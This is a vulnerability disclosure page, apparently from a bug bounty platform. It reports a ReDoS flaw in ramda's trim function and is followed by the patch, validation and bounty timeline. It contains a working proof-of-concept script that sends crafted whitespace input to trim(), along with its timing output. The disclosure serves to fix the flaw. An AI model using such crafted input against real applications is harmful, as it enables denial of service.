We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Inefficient Regular Expression Complexity in ramda/ramda

Valid

Reported on

Aug 26th 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the ramda package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept

Create the following poc.js

// PoC.js
var {trim} = require("ramda");

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Execute the following command in another terminal:

npm i ramda
node poc.js

Check the Output:

time_cost: 2639

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

ready-research submitted a
patch
2 years ago
ready-research
2 years ago

Researcher

With the above patch, the output is

time_cost:  4
We have contacted a member of the ramda team and are waiting to hear back 2 years ago
ready-research submitted a
patch
2 years ago
Scott Sauyet validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Scott Sauyet marked this as fixed with commit 37af6a 2 years ago
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation